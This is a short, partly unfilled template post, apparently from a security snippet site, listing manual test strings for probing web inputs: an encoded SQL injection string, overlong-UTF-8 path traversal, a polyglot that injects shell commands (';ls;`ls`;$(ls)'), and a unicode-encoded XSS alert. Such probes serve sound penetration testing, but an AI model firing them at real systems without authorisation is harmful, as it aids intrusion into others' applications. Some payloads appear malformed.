A very descriptive title by AsmartGuy
That wrote a description about the following code.
<test>|£$%&/()=?^</test>
That wrote a description about the following code.
<test>|£$%&/()=?^</test>
This is a manual test to fing SQL Injections in parameters. It uses various encoding shemes to trigger a SQL error that can be explicit or not. It works on all the mayor SQL servers including MySQL, PostgreSQL, MS SQL Server, MS Access and others.
'"%22%27%2522%2527%252522%252527%uFF22%uFF27);--''
As seen in http://www.milw0rm.com/exploits/6229.
%c0%ae%c0%ae/%c0%ae%c0%ae/ = ../../
1token1>'"%22%27%2522%2527%252522%252527%uFF22%uFF27);--''%00%uFF00%FF%00token2<token3>;ls;`ls`;$(ls);<!--
%uff1cscript%uff1ealert(1)%uff1/script%uff1e
Todotext.. Tagging is a very good idea for the title, just add [category] at the beginning of the title or [category/subcategory]. Todotext..